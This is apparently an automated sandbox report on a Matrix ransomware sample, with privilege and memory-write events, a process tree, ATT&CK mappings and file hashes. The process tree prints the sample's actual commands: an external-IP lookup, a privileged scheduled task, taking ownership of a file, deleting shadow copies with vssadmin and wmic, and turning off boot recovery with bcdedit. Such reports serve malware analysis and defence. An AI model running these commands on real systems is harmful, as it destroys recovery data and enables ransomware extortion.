description pid Process Token: SeDebugPrivilege 792 powershell.exe Token: SeTakeOwnershipPrivilege 3968 takeown.exe Token: SeDebugPrivilege 4892 aczo234m64.exe Token: SeLoadDriverPrivilege 4892 aczo234m64.exe Token: SeBackupPrivilege 3092 vssvc.exe Token: SeRestorePrivilege 3092 vssvc.exe Token: SeAuditPrivilege 3092 vssvc.exe Token: SeIncreaseQuotaPrivilege 1932 WMIC.exe Token: SeSecurityPrivilege 1932 WMIC.exe Token: SeTakeOwnershipPrivilege 1932 WMIC.exe Token: SeLoadDriverPrivilege 1932 WMIC.exe Token: SeSystemProfilePrivilege 1932 WMIC.exe Token: SeSystemtimePrivilege 1932 WMIC.exe Token: SeProfSingleProcessPrivilege 1932 WMIC.exe Token: SeIncBasePriorityPrivilege 1932 WMIC.exe Token: SeCreatePagefilePrivilege 1932 WMIC.exe Token: SeBackupPrivilege 1932 WMIC.exe Token: SeRestorePrivilege 1932 WMIC.exe Token: SeShutdownPrivilege 1932 WMIC.exe Token: SeDebugPrivilege 1932 WMIC.exe Token: SeSystemEnvironmentPrivilege 1932 WMIC.exe Token: SeRemoteShutdownPrivilege 1932 WMIC.exe Token: SeUndockPrivilege 1932 WMIC.exe Token: SeManageVolumePrivilege 1932 WMIC.exe Token: 33 1932 WMIC.exe Token: 34 1932 WMIC.exe Token: 35 1932 WMIC.exe Token: 36 1932 WMIC.exe Token: SeIncreaseQuotaPrivilege 1932 WMIC.exe Token: SeSecurityPrivilege 1932 WMIC.exe Token: SeTakeOwnershipPrivilege 1932 WMIC.exe Token: SeLoadDriverPrivilege 1932 WMIC.exe Token: SeSystemProfilePrivilege 1932 WMIC.exe Token: SeSystemtimePrivilege 1932 WMIC.exe Token: SeProfSingleProcessPrivilege 1932 WMIC.exe Token: SeIncBasePriorityPrivilege 1932 WMIC.exe Token: SeCreatePagefilePrivilege 1932 WMIC.exe Token: SeBackupPrivilege 1932 WMIC.exe Token: SeRestorePrivilege 1932 WMIC.exe Token: SeShutdownPrivilege 1932 WMIC.exe Token: SeDebugPrivilege 1932 WMIC.exe Token: SeSystemEnvironmentPrivilege 1932 WMIC.exe Token: SeRemoteShutdownPrivilege 1932 WMIC.exe Token: SeUndockPrivilege 1932 WMIC.exe Token: SeManageVolumePrivilege 1932 WMIC.exe Token: 33 1932 WMIC.exe Token: 34 1932 WMIC.exe Token: 35 1932 WMIC.exe Token: 36 1932 WMIC.exe Token: SeDebugPrivilege 4288 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1652 wrote to memory of 4816 1652 907636b28d162f7110b067a8178fa38c.exe 81 PID 1652 wrote to memory of 4816 1652 907636b28d162f7110b067a8178fa38c.exe 81 PID 1652 wrote to memory of 4816 1652 907636b28d162f7110b067a8178fa38c.exe 81 PID 1652 wrote to memory of 4760 1652 907636b28d162f7110b067a8178fa38c.exe 83 PID 1652 wrote to memory of 4760 1652 907636b28d162f7110b067a8178fa38c.exe 83 PID 1652 wrote to memory of 4760 1652 907636b28d162f7110b067a8178fa38c.exe 83 PID 1652 wrote to memory of 4712 1652 907636b28d162f7110b067a8178fa38c.exe 91 PID 1652 wrote to memory of 4712 1652 907636b28d162f7110b067a8178fa38c.exe 91 PID 1652 wrote to memory of 4712 1652 907636b28d162f7110b067a8178fa38c.exe 91 PID 4712 wrote to memory of 792 4712 cmd.exe 93 PID 4712 wrote to memory of 792 4712 cmd.exe 93 PID 4712 wrote to memory of 792 4712 cmd.exe 93 PID 1652 wrote to memory of 5032 1652 907636b28d162f7110b067a8178fa38c.exe 94 PID 1652 wrote to memory of 5032 1652 907636b28d162f7110b067a8178fa38c.exe 94 PID 1652 wrote to memory of 5032 1652 907636b28d162f7110b067a8178fa38c.exe 94 PID 1652 wrote to memory of 552 1652 907636b28d162f7110b067a8178fa38c.exe 96 PID 1652 wrote to memory of 552 1652 907636b28d162f7110b067a8178fa38c.exe 96 PID 1652 wrote to memory of 552 1652 907636b28d162f7110b067a8178fa38c.exe 96 PID 5032 wrote to memory of 4252 5032 cmd.exe 98 PID 5032 wrote to memory of 4252 5032 cmd.exe 98 PID 5032 wrote to memory of 4252 5032 cmd.exe 98 PID 552 wrote to memory of 428 552 cmd.exe 99 PID 552 wrote to memory of 428 552 cmd.exe 99 PID 552 wrote to memory of 428 552 cmd.exe 99 PID 1652 wrote to memory of 3328 1652 907636b28d162f7110b067a8178fa38c.exe 101 PID 1652 wrote to memory of 3328 1652 907636b28d162f7110b067a8178fa38c.exe 101 PID 1652 wrote to memory of 3328 1652 907636b28d162f7110b067a8178fa38c.exe 101 PID 5032 wrote to memory of 4704 5032 cmd.exe 103 PID 5032 wrote to memory of 4704 5032 cmd.exe 103 PID 5032 wrote to memory of 4704 5032 cmd.exe 103 PID 5032 wrote to memory of 4136 5032 cmd.exe 104 PID 5032 wrote to memory of 4136 5032 cmd.exe 104 PID 5032 wrote to memory of 4136 5032 cmd.exe 104 PID 3328 wrote to memory of 4064 3328 cmd.exe 105 PID 3328 wrote to memory of 4064 3328 cmd.exe 105 PID 3328 wrote to memory of 4064 3328 cmd.exe 105 PID 3328 wrote to memory of 536 3328 cmd.exe 106 PID 3328 wrote to memory of 536 3328 cmd.exe 106 PID 3328 wrote to memory of 536 3328 cmd.exe 106 PID 3328 wrote to memory of 3968 3328 cmd.exe 108 PID 3328 wrote to memory of 3968 3328 cmd.exe 108 PID 3328 wrote to memory of 3968 3328 cmd.exe 108 PID 3328 wrote to memory of 3960 3328 cmd.exe 109 PID 3328 wrote to memory of 3960 3328 cmd.exe 109 PID 3328 wrote to memory of 3960 3328 cmd.exe 109 PID 3960 wrote to memory of 4784 3960 cmd.exe 110 PID 3960 wrote to memory of 4784 3960 cmd.exe 110 PID 3960 wrote to memory of 4784 3960 cmd.exe 110 PID 4784 wrote to memory of 4892 4784 aczo234m.exe 111 PID 4784 wrote to memory of 4892 4784 aczo234m.exe 111 PID 428 wrote to memory of 4928 428 wscript.exe 112 PID 428 wrote to memory of 4928 428 wscript.exe 112 PID 428 wrote to memory of 4928 428 wscript.exe 112 PID 4928 wrote to memory of 3736 4928 cmd.exe 114 PID 4928 wrote to memory of 3736 4928 cmd.exe 114 PID 4928 wrote to memory of 3736 4928 cmd.exe 114 PID 428 wrote to memory of 3552 428 wscript.exe 115 PID 428 wrote to memory of 3552 428 wscript.exe 115 PID 428 wrote to memory of 3552 428 wscript.exe 115 PID 3552 wrote to memory of 3468 3552 cmd.exe 117 PID 3552 wrote to memory of 3468 3552 cmd.exe 117 PID 3552 wrote to memory of 3468 3552 cmd.exe 117 PID 3512 wrote to memory of 4128 3512 cmd.exe 121 PID 3512 wrote to memory of 4128 3512 cmd.exe 121 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4064 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\907636b28d162f7110b067a8178fa38c.exe"C:\Users\Admin\AppData\Local\Temp\907636b28d162f7110b067a8178fa38c.exe"1⤵
- Matrix Ransomware
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\907636b28d162f7110b067a8178fa38c.exe" "C:\Users\Admin\AppData\Local\Temp\NWTW8a7C.exe"2⤵PID:4816
-
-
C:\Users\Admin\AppData\Local\Temp\NWTW8a7C.exe"C:\Users\Admin\AppData\Local\Temp\NWTW8a7C.exe" -n2⤵
- Executes dropped EXE
PID:4760
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\aWUc913K.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:792
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\u5msjCEb.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\u5msjCEb.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:4252
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:4704
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:4136
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\gEXzcVfw.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\gEXzcVfw.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\KXZTPMk3.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\KXZTPMk3.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:3736
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:3468
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QSIInvIW.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
PID:3328 -
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Views/modifies file attributes
PID:4064
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:536
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c aczo234m.exe -accepteula "store.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Users\Admin\AppData\Local\Temp\aczo234m.exeaczo234m.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Users\Admin\AppData\Local\Temp\aczo234m64.exeaczo234m.exe -accepteula "store.db" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Sets service image path in registry
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:4892
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\KXZTPMk3.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:4128
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4288 -
C:\Windows\system32\vssadmin.exe"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:812
-
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:3728
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:4368
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:3716
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3092
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Hidden Files and Directories
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16KB
MD5a940f5a3065bd1f806f880f27de0ebd7
SHA1145fe0103db6f6685307b73d24cd29c24def2efd
SHA25670d9faaebcd07dc0ae57ae0e049352b88f9634ebb8078c29018dffc8864ed2ef
SHA51282a1c64b0ff9f45b8fa748501c540fe8221b450a9f01a96f860b058a02cf3efff580a0e4183f40767300738b2958758b884c418b6a02706469901af95e45a196
-
Filesize
1.2MB
MD5907636b28d162f7110b067a8178fa38c
SHA1048ae4691fe267e7c8d9eda5361663593747142a
SHA2566e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b
SHA512501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a
-
Filesize
1.2MB
MD5907636b28d162f7110b067a8178fa38c
SHA1048ae4691fe267e7c8d9eda5361663593747142a
SHA2566e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b
SHA512501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a
-
Filesize
246B
MD56d2a10672e1c5f04b2d29f5b518c62c6
SHA1eaecceda5b4646e14693993d41954123824cd455
SHA25609bae4c21417617ad94c5f7ed1e546dea54bb60f5415953d49c0e002168cf4c5
SHA5127c06adfbcd982153bb64e97e77c069369c3343cf2151847d564005a2997f7d49d04e61b6749a22df51278eb573e6ba21b5615f70271eba9c7e70b832a8892068
-
Filesize
14B
MD575564e2df4b8c8d33695e8e5e58cb03c
SHA164a796a9f01a1f12bcbe641ecc92541a41ece9b5
SHA256bfc3a26300e7bd0144a9974a6cc1f88f555dd022002aab0166aa0813070a8965
SHA512c24aa065ed61adf4f32d9dd1edd089163b0b953a10ef14f87f4095c0677cc27c684c3666ab1911e4e21f2517d1292454c3016255bb3279e2ff48a59257b455af
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
415B
MD59c13453e38fbd86395ed5801778c0184
SHA1377ff2656afd7b629e5b0b694f7d2bdb43183ed3
SHA2562d20298dcb8497c7fbcee4524a88c3e5ea8cae130d8bd14ba30b1f77d3addc03
SHA5124722f788d0afb836e637a9b41d2cd35fb936ada1de9e4be5b574343adcfdf882229860bf831f6dfe614ea144f2c8e2f3fcbd86f84aa25ccbe587fad0fd226067
-
Filesize
260B
MD52bf97203a0d426b757f9adf7186cd164
SHA18aae6d2fbda7a4684247288f3d7aa113aa0ade88
SHA2563eb49d32abb9f63526d36ceb0c96ec41e7f4c1fa3f6f8714fe395926dcad10bb
SHA512757a2991e5fb38da036e0eb59035f321691f776a8877b2962ece066052a3f0c97177b1fdcf7d46395aa7b33280283526d1de9583be84485d51ae2f5d7ee93257